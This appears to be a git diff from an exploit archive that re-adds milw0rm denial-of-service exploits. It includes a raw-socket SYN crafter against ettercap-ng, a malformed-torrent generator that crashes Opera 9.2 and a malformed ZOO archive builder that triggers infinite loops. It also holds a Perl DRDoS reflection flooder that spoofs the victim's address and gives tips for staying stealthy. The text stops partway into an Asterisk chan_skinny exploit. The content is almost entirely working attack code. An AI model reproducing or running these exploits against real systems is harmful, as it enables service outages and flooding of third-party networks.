VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P\"' `\"Y8, . \n"); + printf(" yxxx.$$.xxxxxxxxxxxx ,d$\"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg \n"); + printf(" $ P' $$,d$$Yba, ,d$\" d $$ $$,d$$Yba, 88 ,$.$$$ $ \n"); + printf(" $ ' $$P' ,`$$a ,d$\" ``\" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ \n"); + printf(" $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ \n"); + printf(" bxxx.$$$, '`,d$\".xxxxxxxx.$$.x.$$b, ',a$$\".x`8ba,,aad$$'.xxxxd. . \n"); + printf(" s$Y\"Y$bd$P',yas.VVVV s$$z $Y\"Y$$$P\"' \"Y$$$$(headflux)$ \n"); + printf(" VVVVVVVV VVVVVVVV \n"); + printf(" VVVVVVVV VVVVVVVV \n"); + printf(" ettercap-ng v0.7.3 VVVVVVVV VVVVVVVV \n"); + printf(" Denial of Service VVVVVVVVVVVVVVVV \n"); + printf(" by EvilRabbi VVVVVVVVVVVVVV \n"); + printf(" VVVVVV \n"); + printf(" VVVV \n"); + printf(" VV \n"); +} +unsigned short ipChecksum(unsigned short *ptr, int nbytes) +{ + register long sum; + register u_short answer; + u_short oddbyte; + + sum = 0; + + while (nbytes > 1) { + sum += *ptr++; + nbytes -= 2; + } + + if (nbytes == 1) { + oddbyte = 0; + *((u_char *) & oddbyte) = *(u_char *) ptr; + sum += oddbyte; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; +return (answer); +} + +int main(int argc, char **argv) +{ + int sockfd, opt = 1; + char tcpoptions[4]; + char dest[20]; + unsigned int pLen,sIPLen; + unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)]; + unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)]; + struct hostent *he; + struct sockaddr_in host; + struct sockaddr_in s; + + struct in_addr etter; + IP *iphdr = (IP *)pkt; + TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP)); + + if (getuid() != 0) { + printf("you need to be r00t =(\n"); + exit(0); + } + + if (argc != 2) { + usage(); + exit(0); + } + if ((he=gethostbyname(argv[1])) == NULL) { // get the host info + herror("gethostbyname"); + exit(1); + } + snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned char)he->h_addr_list[0][0], + (unsigned char)he->h_addr_list[0][1], + (unsigned char)he->h_addr_list[0][2], + (unsigned char)he->h_addr_list[0][3]); + + if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) { + perror("socket"); + exit(1); + } + setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt)); + + etter.s_addr = inet_addr(dest); + s.sin_addr.s_addr = INADDR_ANY; + //etter.s_addr = inet_addr("69.46.19.77"); + memset(tcpoptions,0,sizeof(tcpoptions)); + tcpoptions[0]=0x08; + tcpoptions[1]=0x00; + tcpoptions[2]=0x00; + tcpoptions[3]=0x00; + + memset(&host, 0, sizeof(host)); + memset(pkt, 0, pLen); + memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions)); + memset(ip, 0, sIPLen); + *((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr; + *((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr; + *((unsigned char *)((unsigned char *)ip+8)) = 0; + *((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP; + *((unsigned short *)((unsigned char *)ip+10)) = htons(pLen - sizeof(IP)); + iphdr->version = 4; + iphdr->ihl = 5; + iphdr->id = rand() & 0xFFFF; + iphdr->id = iphdr->id + 1; + iphdr->saddr = s.sin_addr.s_addr; + iphdr->daddr = etter.s_addr; + iphdr->protocol = IPPROTO_TCP; + iphdr->ttl = 255; + iphdr->tot_len = pLen; + iphdr->check = ipChecksum((u_short *)iphdr, sizeof(IP)); + + host.sin_family = AF_INET; + host.sin_addr.s_addr = etter.s_addr; + + tcphdr->source = htons(8); + tcphdr->dest = htons(1); + tcphdr->seq = htonl(rand()); + tcphdr->ack_seq = htonl(rand()); + tcphdr->doff = ((sizeof(TCP)+4) / 4); + tcphdr->check=0; + tcphdr->fin = 0; + tcphdr->syn = 1; + tcphdr->rst = 0; + tcphdr->psh = 0; + tcphdr->ack = 0; + tcphdr->urg = 0; + tcphdr->window = htons(5840); + memcpy(ip+12, ((unsigned char *)pkt)+sizeof(IP), pLen - sizeof(IP)); + tcphdr->check = ipChecksum((u_short *)&ip, sIPLen); + + sendto(sockfd, pkt, pLen, 0, (struct sockaddr *)&host, sizeof(host)); + + return 0; +} + +// milw0rm.com [2007-04-13] diff --git a/platforms/multiple/dos/3784.c b/platforms/multiple/dos/3784.c index f71907983..7a2990b0f 100755 --- a/platforms/multiple/dos/3784.c +++ b/platforms/multiple/dos/3784.c @@ -1,113 +1,113 @@ -/************************************************************************ - - -* Created Date :April 23 2007 -* -* Credits go to n00b for finding this vulnerability and writing p0c. -* Moderator of http://igniteds.net -* -* 0pera 9.2 torrent file remote dos exploit. -* -* opera has its own bit torrent client with-in the web browser -* it is possible to crash opera with a malformed torrent file -* causing denial of service to legitimate users..Opera will -* use 100% cpu till the inevitable happens..Which will be a crash -* To fix this problem disable the bitorrent with in opera.. -* -* Tested : win xp service pack 1 and 2 -* -* I wasn't able to catch any debugging info I'm afraid maybe some one -* else can give it a go. -* -* All i was able to get from drwatson pmsl was. -************************************************************************ - -* Application exception occurred: -* App: C:\Program Files\Opera\Opera.exe (pid=1084) -* When: 4/22/2007 @ 14:55:29.296 -* Exception number: 80000003 (hard coded breakpoint) -************************************************************************ - -* Seams like some sort of memory leak with the bitorrent client -* of opera.. -************************************************************************ - -******************************** -**/ - - -#include -#include -#include - -void usage(char* file); - -char header[] = "\x64\x38"; - -char My_buff[] = -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; - -char trailing_buff[] = -"\x36\x31\x3a\x09\x44\x69\x65\x20\x6f\x70\x65\x72\x61" - "\x20\x79\x6f\x75\x20\x73\x6c\x75\x74"; - -int main(int argc,char* argv[]) -{ - system("cls"); - - printf("\n *************************************************"); - printf("\n * Opera torrent file dos exploit by n00b *"); - printf("\n *************************************************"); - printf("\n * Shouts to every one at milw0rm *"); - printf("\n *************************************************"); - printf("\n * Special thanks to str0ke *"); - printf("\n * *"); - printf("\n * Date :Aprill 23 2007 *"); - printf("\n *************************************************"); - printf("\n * CREDITS TO n00b FOR FINDING THIS BUG *"); - printf("\n *************************************************"); - - if ( argc!=2 ) - { - usage(argv[0]); - } - - FILE *f; - f = fopen(argv[1],"w"); - if ( !f ) - { - printf("\nFuck some thing went wrong :D"); - exit(1); - } - - printf("\n\nMaking torrent file..."); - - fwrite(header,1,sizeof(header),f); - - fwrite(My_buff,1,sizeof(My_buff),f); - - fwrite(trailing_buff,1,sizeof(trailing_buff),f); - - printf("\nDone hoooooha!"); - printf("\n "); - printf("\n0h noes memory leak pmsl !!"); - return 0; -} - -void usage(char* file) -{ - - printf("\n\nusage: n00b.exe opera.torrent"); - exit(1); -} - -// milw0rm.com [2007-04-23] +/************************************************************************ + + +* Created Date :April 23 2007 +* +* Credits go to n00b for finding this vulnerability and writing p0c. +* Moderator of http://igniteds.net +* +* 0pera 9.2 torrent file remote dos exploit. +* +* opera has its own bit torrent client with-in the web browser +* it is possible to crash opera with a malformed torrent file +* causing denial of service to legitimate users..Opera will +* use 100% cpu till the inevitable happens..Which will be a crash +* To fix this problem disable the bitorrent with in opera.. +* +* Tested : win xp service pack 1 and 2 +* +* I wasn't able to catch any debugging info I'm afraid maybe some one +* else can give it a go. +* +* All i was able to get from drwatson pmsl was. +************************************************************************ + +* Application exception occurred: +* App: C:\Program Files\Opera\Opera.exe (pid=1084) +* When: 4/22/2007 @ 14:55:29.296 +* Exception number: 80000003 (hard coded breakpoint) +************************************************************************ + +* Seams like some sort of memory leak with the bitorrent client +* of opera.. +************************************************************************ + +******************************** +**/ + + +#include +#include +#include + +void usage(char* file); + +char header[] = "\x64\x38"; + +char My_buff[] = +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; + +char trailing_buff[] = +"\x36\x31\x3a\x09\x44\x69\x65\x20\x6f\x70\x65\x72\x61" + "\x20\x79\x6f\x75\x20\x73\x6c\x75\x74"; + +int main(int argc,char* argv[]) +{ + system("cls"); + + printf("\n *************************************************"); + printf("\n * Opera torrent file dos exploit by n00b *"); + printf("\n *************************************************"); + printf("\n * Shouts to every one at milw0rm *"); + printf("\n *************************************************"); + printf("\n * Special thanks to str0ke *"); + printf("\n * *"); + printf("\n * Date :Aprill 23 2007 *"); + printf("\n *************************************************"); + printf("\n * CREDITS TO n00b FOR FINDING THIS BUG *"); + printf("\n *************************************************"); + + if ( argc!=2 ) + { + usage(argv[0]); + } + + FILE *f; + f = fopen(argv[1],"w"); + if ( !f ) + { + printf("\nFuck some thing went wrong :D"); + exit(1); + } + + printf("\n\nMaking torrent file..."); + + fwrite(header,1,sizeof(header),f); + + fwrite(My_buff,1,sizeof(My_buff),f); + + fwrite(trailing_buff,1,sizeof(trailing_buff),f); + + printf("\nDone hoooooha!"); + printf("\n "); + printf("\n0h noes memory leak pmsl !!"); + return 0; +} + +void usage(char* file) +{ + + printf("\n\nusage: n00b.exe opera.torrent"); + exit(1); +} + +// milw0rm.com [2007-04-23] diff --git a/platforms/multiple/dos/3851.c b/platforms/multiple/dos/3851.c index 4e0644e39..c7645c02b 100755 --- a/platforms/multiple/dos/3851.c +++ b/platforms/multiple/dos/3851.c @@ -1,165 +1,165 @@ -/* - -Exploit for the vulnerability: -Multiple vendors ZOO file decompression infinite loop DoS - -coded by Jean-Sébastien Guay-Leroux -September 2006 - -*/ - -#include -#include -#include - -// Structure of a ZOO header - -#define ZOO_HEADER_SIZE 0x0000002a - -#define ZH_TEXT 0 -#define ZH_TAG 20 -#define ZH_START_OFFSET 24 -#define ZH_NEG_START_OFFSET 28 -#define ZH_MAJ_VER 32 -#define ZH_MIN_VER 33 -#define ZH_ARC_HTYPE 34 -#define ZH_ARC_COMMENT 35 -#define ZH_ARC_COMMENT_LENGTH 39 -#define ZH_VERSION_DATA 41 - - -#define D_DIRENTRY_LENGTH 56 - -#define D_TAG 0 -#define D_TYPE 4 -#define D_PACKING_METHOD 5 -#define D_NEXT_ENTRY 6 -#define D_OFFSET 10 -#define D_DATE 14 -#define D_TIME 16 -#define D_FILE_CRC 18 -#define D_ORIGINAL_SIZE 20 -#define D_SIZE_NOW 24 -#define D_MAJ_VER 28 -#define D_MIN_VER 29 -#define D_DELETED 30 -#define D_FILE_STRUCT 31 -#define D_COMMENT_OFFSET 32 -#define D_COMMENT_SIZE 36 -#define D_FILENAME 38 -#define D_VAR_DIR_LEN 51 -#define D_TIMEZONE 53 -#define D_DIR_CRC 54 -#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) -#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) -#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) - - -void put_byte (char *ptr, unsigned char data) { - *ptr = data; -} - -void put_word (char *ptr, unsigned short data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); -} - -void put_longword (char *ptr, unsigned long data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); - put_byte (ptr + 2, data >> 16); - put_byte (ptr + 3, data >> 24); -} - -FILE * open_file (char *filename) { - - FILE *fp; - - fp = fopen ( filename , "w" ); - - if (!fp) { - perror ("Cant open file"); - exit (1); - } - - return fp; -} - -void usage (char *progname) { - - printf ("\nTo use:\n"); - printf ("%s \n\n", progname); - - exit (1); -} - -int main (int argc, char *argv[]) { - FILE *fp; - char *hdr = (char *) malloc (4096); - char *filename = (char *) malloc (256); - int written_bytes; - int total_size; - - if ( argc != 2) { - usage ( argv[0] ); - } - - strncpy (filename, argv[1], 255); - - if (!hdr || !filename) { - perror ("Error allocating memory"); - exit (1); - } - - memset (hdr, 0x00, 4096); - - // Build a ZOO header - memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); - put_longword (hdr + ZH_TAG, 0xfdc4a7dc); - put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); - put_longword (hdr + ZH_NEG_START_OFFSET, - (ZOO_HEADER_SIZE) * -1); - put_byte (hdr + ZH_MAJ_VER, 2); - put_byte (hdr + ZH_MIN_VER, 0); - put_byte (hdr + ZH_ARC_HTYPE, 1); - put_longword (hdr + ZH_ARC_COMMENT, 0); - put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); - put_byte (hdr + ZH_VERSION_DATA, 3); - - // Build vulnerable direntry struct - put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); - put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); - put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); - put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); - put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); - put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); - put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); - put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); - put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); - put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); - put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); - put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); - memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, - "AAAAAAAA.AAA", 13); - - total_size = ZOO_HEADER_SIZE + 51; - - fp = open_file (filename); - - if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { - printf ("The file has been written\n"); - } else { - printf ("Cant write to the file\n"); - exit (1); - } - - fclose (fp); - - return 0; -} - -// milw0rm.com [2007-05-04] +/* + +Exploit for the vulnerability: +Multiple vendors ZOO file decompression infinite loop DoS + +coded by Jean-Sébastien Guay-Leroux +September 2006 + +*/ + +#include +#include +#include + +// Structure of a ZOO header + +#define ZOO_HEADER_SIZE 0x0000002a + +#define ZH_TEXT 0 +#define ZH_TAG 20 +#define ZH_START_OFFSET 24 +#define ZH_NEG_START_OFFSET 28 +#define ZH_MAJ_VER 32 +#define ZH_MIN_VER 33 +#define ZH_ARC_HTYPE 34 +#define ZH_ARC_COMMENT 35 +#define ZH_ARC_COMMENT_LENGTH 39 +#define ZH_VERSION_DATA 41 + + +#define D_DIRENTRY_LENGTH 56 + +#define D_TAG 0 +#define D_TYPE 4 +#define D_PACKING_METHOD 5 +#define D_NEXT_ENTRY 6 +#define D_OFFSET 10 +#define D_DATE 14 +#define D_TIME 16 +#define D_FILE_CRC 18 +#define D_ORIGINAL_SIZE 20 +#define D_SIZE_NOW 24 +#define D_MAJ_VER 28 +#define D_MIN_VER 29 +#define D_DELETED 30 +#define D_FILE_STRUCT 31 +#define D_COMMENT_OFFSET 32 +#define D_COMMENT_SIZE 36 +#define D_FILENAME 38 +#define D_VAR_DIR_LEN 51 +#define D_TIMEZONE 53 +#define D_DIR_CRC 54 +#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) +#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) +#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) + + +void put_byte (char *ptr, unsigned char data) { + *ptr = data; +} + +void put_word (char *ptr, unsigned short data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); +} + +void put_longword (char *ptr, unsigned long data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); + put_byte (ptr + 2, data >> 16); + put_byte (ptr + 3, data >> 24); +} + +FILE * open_file (char *filename) { + + FILE *fp; + + fp = fopen ( filename , "w" ); + + if (!fp) { + perror ("Cant open file"); + exit (1); + } + + return fp; +} + +void usage (char *progname) { + + printf ("\nTo use:\n"); + printf ("%s \n\n", progname); + + exit (1); +} + +int main (int argc, char *argv[]) { + FILE *fp; + char *hdr = (char *) malloc (4096); + char *filename = (char *) malloc (256); + int written_bytes; + int total_size; + + if ( argc != 2) { + usage ( argv[0] ); + } + + strncpy (filename, argv[1], 255); + + if (!hdr || !filename) { + perror ("Error allocating memory"); + exit (1); + } + + memset (hdr, 0x00, 4096); + + // Build a ZOO header + memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); + put_longword (hdr + ZH_TAG, 0xfdc4a7dc); + put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); + put_longword (hdr + ZH_NEG_START_OFFSET, + (ZOO_HEADER_SIZE) * -1); + put_byte (hdr + ZH_MAJ_VER, 2); + put_byte (hdr + ZH_MIN_VER, 0); + put_byte (hdr + ZH_ARC_HTYPE, 1); + put_longword (hdr + ZH_ARC_COMMENT, 0); + put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); + put_byte (hdr + ZH_VERSION_DATA, 3); + + // Build vulnerable direntry struct + put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); + put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); + put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); + put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); + put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); + put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); + put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); + put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); + put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); + put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); + put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); + put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); + memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, + "AAAAAAAA.AAA", 13); + + total_size = ZOO_HEADER_SIZE + 51; + + fp = open_file (filename); + + if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { + printf ("The file has been written\n"); + } else { + printf ("Cant write to the file\n"); + exit (1); + } + + fclose (fp); + + return 0; +} + +// milw0rm.com [2007-05-04] diff --git a/platforms/multiple/dos/3871.html b/platforms/multiple/dos/3871.html index 98ce8046e..598fe7956 100755 --- a/platforms/multiple/dos/3871.html +++ b/platforms/multiple/dos/3871.html @@ -1,51 +1,51 @@ - - - - - - - -# milw0rm.com [2007-05-08] + + + + + + + +# milw0rm.com [2007-05-08] diff --git a/platforms/multiple/dos/4038.pl b/platforms/multiple/dos/4038.pl index 884e98397..3faf8163a 100755 --- a/platforms/multiple/dos/4038.pl +++ b/platforms/multiple/dos/4038.pl @@ -1,139 +1,139 @@ -#!/usr/bin/perl - -# -# ~written by whoppix (c) 2007~ -# This Piece of software may be freely (re-)distributed under the Terms of the LGPL. -# for a short usage type ./script --help -# this program requires: perl, Net::RawIP (depends on libpcap), Getopt::Long -# (which should be shipped along with your perl core distribution) -# if you want to gain a deeper understanding about how DRDoS works, have a look at: -# http://www.grc.com/dos/drdos.htm -# This program is written for testing and researching purposes only. -# - -use warnings; -use strict; -use Net::RawIP; -use Getopt::Long; - -my $verbose = '0'; -my $syn_count = '1'; -my $victim = '127.0.0.1'; -my @lists = (); -my $net = new Net::RawIP; - -GetOptions( - 'verbose+' => \$verbose, - 'syn_count=s' => \$syn_count, - 'list=s' => \@lists, - 'help' => \&usage, -); -$victim = shift @ARGV; -if ( !$victim ) { - die "Error: No target specified, use --help\n"; -} -if ( !@lists ) { - die "Error: You have to specify at least one reflector list, use --help\n"; -} -foreach my $file (@lists) { - if ( !-e $file ) { - die "File does not seem to exist: $file\n"; - } -} -print "Starting attack on target $victim.\n"; -print "press Ctrl-C to interrupt at any time.\n" if $verbose >= 1; -while (1) { - foreach my $listfile (@lists) { - print "Loading reflector file: $listfile\n" if $verbose >= 1; - open( my $list, "<", $listfile ) - or die "Error opening file for reading: $listfile\n"; - while (<$list>) { - chomp; - if ( check_format($_) ) { - my $counter = $syn_count; - my $reflector = $_; - my ( $ip, $port ) = split( ':', $reflector ); - print "reflector ip: $ip, reflector port: $port\n" - if $verbose > 1; - for ( my $counter = $syn_count; $counter > 0; $counter-- ) { - print "attacking using reflector: $reflector\n" - if $verbose > 1; - my $rand = int( rand(65535) ); - while ( $rand == 0 ) { - print - "random number calculated for SRCPORT was zero, retrying...\n" - if $verbose > 1; - $rand = int( rand(65535) ); - } - print "random port used for SRCPORT: $rand\n" - if $verbose > 1; - $net->set( - { ip => { - saddr => $victim, - daddr => $ip, - }, - tcp => { - source => $rand, - dest => $port, - syn => 1, - }, - } - ); - $net->send(); - } - } - else { - print - "mirror \"$_\" not in correct format (ip:port) omitting...\n" - if $verbose >= 1; - } - } - } -} - -sub usage { - print "\nusage:\n\n"; - print "--help\t\t: youre reading it\n"; - print - "--verbose\t: makes the script more verbose. can be used several times to increase verbosity.\n"; - print "--list\t\t: used to specify a reflectorlist.\n"; - print - "\t\texample: ./script --list list1.txt --list list2.txt --list list3.txt 127.0.0.1\n"; - print - "\t\tthe more (and longer) lists you have, the better will the result be, and the more stealth you will gain.\n"; - print - "--syn_count\t: used to set the syn_count to a special value. default is 1.\n"; - print "\t\tdon't use too much - that would decrease your stealth. Default (and that should be fine) is 1.\n"; - print "\nGeneral information:\n"; - print "The usage of multiple lists can increase your stealth.\n"; - print "The more Mirrors or \"reflectors\" you use, the better will the result be.\n"; - print "The better the bandwidth of your mirrors is, the better will the result be.\n"; - print "Generally spoken is the bandwidth you use to flood your victim amplified by the factor 3-4.\n\n"; - die "\n"; -} - -sub check_format { # a function to check the ip:port format. - no warnings; - my $address = shift; - my ( $ip, $port ) = split( ':', $address ); - my @octets = split( '\.', $ip ); - - if ( $port < 1 or $port > 65535 ) { - print "port $port too high or low\n" if $verbose >= 1; - return; - } - if ( @octets != 4 ) { - print "ip has invalid number of octetts: $ip\n" if $verbose >= 1; - return; - } - foreach my $octet (@octets) { - if ( $octet < 0 or $octet > 255 ) { - print "octet is invalid: $octet\n" if $verbose >= 1; - return; - } - } - print "VALID!\n" if $verbose > 1; - return 1; -} - -# milw0rm.com [2007-06-06] +#!/usr/bin/perl + +# +# ~written by whoppix (c) 2007~ +# This Piece of software may be freely (re-)distributed under the Terms of the LGPL. +# for a short usage type ./script --help +# this program requires: perl, Net::RawIP (depends on libpcap), Getopt::Long +# (which should be shipped along with your perl core distribution) +# if you want to gain a deeper understanding about how DRDoS works, have a look at: +# http://www.grc.com/dos/drdos.htm +# This program is written for testing and researching purposes only. +# + +use warnings; +use strict; +use Net::RawIP; +use Getopt::Long; + +my $verbose = '0'; +my $syn_count = '1'; +my $victim = '127.0.0.1'; +my @lists = (); +my $net = new Net::RawIP; + +GetOptions( + 'verbose+' => \$verbose, + 'syn_count=s' => \$syn_count, + 'list=s' => \@lists, + 'help' => \&usage, +); +$victim = shift @ARGV; +if ( !$victim ) { + die "Error: No target specified, use --help\n"; +} +if ( !@lists ) { + die "Error: You have to specify at least one reflector list, use --help\n"; +} +foreach my $file (@lists) { + if ( !-e $file ) { + die "File does not seem to exist: $file\n"; + } +} +print "Starting attack on target $victim.\n"; +print "press Ctrl-C to interrupt at any time.\n" if $verbose >= 1; +while (1) { + foreach my $listfile (@lists) { + print "Loading reflector file: $listfile\n" if $verbose >= 1; + open( my $list, "<", $listfile ) + or die "Error opening file for reading: $listfile\n"; + while (<$list>) { + chomp; + if ( check_format($_) ) { + my $counter = $syn_count; + my $reflector = $_; + my ( $ip, $port ) = split( ':', $reflector ); + print "reflector ip: $ip, reflector port: $port\n" + if $verbose > 1; + for ( my $counter = $syn_count; $counter > 0; $counter-- ) { + print "attacking using reflector: $reflector\n" + if $verbose > 1; + my $rand = int( rand(65535) ); + while ( $rand == 0 ) { + print + "random number calculated for SRCPORT was zero, retrying...\n" + if $verbose > 1; + $rand = int( rand(65535) ); + } + print "random port used for SRCPORT: $rand\n" + if $verbose > 1; + $net->set( + { ip => { + saddr => $victim, + daddr => $ip, + }, + tcp => { + source => $rand, + dest => $port, + syn => 1, + }, + } + ); + $net->send(); + } + } + else { + print + "mirror \"$_\" not in correct format (ip:port) omitting...\n" + if $verbose >= 1; + } + } + } +} + +sub usage { + print "\nusage:\n\n"; + print "--help\t\t: youre reading it\n"; + print + "--verbose\t: makes the script more verbose. can be used several times to increase verbosity.\n"; + print "--list\t\t: used to specify a reflectorlist.\n"; + print + "\t\texample: ./script --list list1.txt --list list2.txt --list list3.txt 127.0.0.1\n"; + print + "\t\tthe more (and longer) lists you have, the better will the result be, and the more stealth you will gain.\n"; + print + "--syn_count\t: used to set the syn_count to a special value. default is 1.\n"; + print "\t\tdon't use too much - that would decrease your stealth. Default (and that should be fine) is 1.\n"; + print "\nGeneral information:\n"; + print "The usage of multiple lists can increase your stealth.\n"; + print "The more Mirrors or \"reflectors\" you use, the better will the result be.\n"; + print "The better the bandwidth of your mirrors is, the better will the result be.\n"; + print "Generally spoken is the bandwidth you use to flood your victim amplified by the factor 3-4.\n\n"; + die "\n"; +} + +sub check_format { # a function to check the ip:port format. + no warnings; + my $address = shift; + my ( $ip, $port ) = split( ':', $address ); + my @octets = split( '\.', $ip ); + + if ( $port < 1 or $port > 65535 ) { + print "port $port too high or low\n" if $verbose >= 1; + return; + } + if ( @octets != 4 ) { + print "ip has invalid number of octetts: $ip\n" if $verbose >= 1; + return; + } + foreach my $octet (@octets) { + if ( $octet < 0 or $octet > 255 ) { + print "octet is invalid: $octet\n" if $verbose >= 1; + return; + } + } + print "VALID!\n" if $verbose > 1; + return 1; +} + +# milw0rm.com [2007-06-06] diff --git a/platforms/multiple/dos/4175.php b/platforms/multiple/dos/4175.php index e34918da6..c28e1fd05 100755 --- a/platforms/multiple/dos/4175.php +++ b/platforms/multiple/dos/4175.php @@ -1,23 +1,23 @@ - - -# milw0rm.com [2007-07-12] + + +# milw0rm.com [2007-07-12] diff --git a/platforms/multiple/dos/4181.php b/platforms/multiple/dos/4181.php index 282d94061..4113ed67b 100755 --- a/platforms/multiple/dos/4181.php +++ b/platforms/multiple/dos/4181.php @@ -1,36 +1,36 @@ - - -# milw0rm.com [2007-07-14] + + +# milw0rm.com [2007-07-14] diff --git a/platforms/multiple/dos/4196.c b/platforms/multiple/dos/4196.c index 8ce4abde2..99ab6ec6f 100755 --- a/platforms/multiple/dos/4196.c +++ b/platforms/multiple/dos/4196.c @@ -1,181 +1,181 @@ -/* - * AstKilla2.c - * gcc -o astkilla2 astkilla2.c - * ./astkilla2 -h 216.246.**.*** - * In no event will the author of this source be liable for any loss or damage of a material or - * immaterial nature arising from access to, use or non-use of published information, or from misuse of the connection or technical faults. - - - chan_skinny runs on 2000/TCP if you find a host with this open there is a really decent chance it's a asterisk machine some admin - forgot to disable chan_skinny on (which is default).. this should be a to all of those who don't lock down what they dont need (what is this 1999 ?) - - this is really quite old but as it 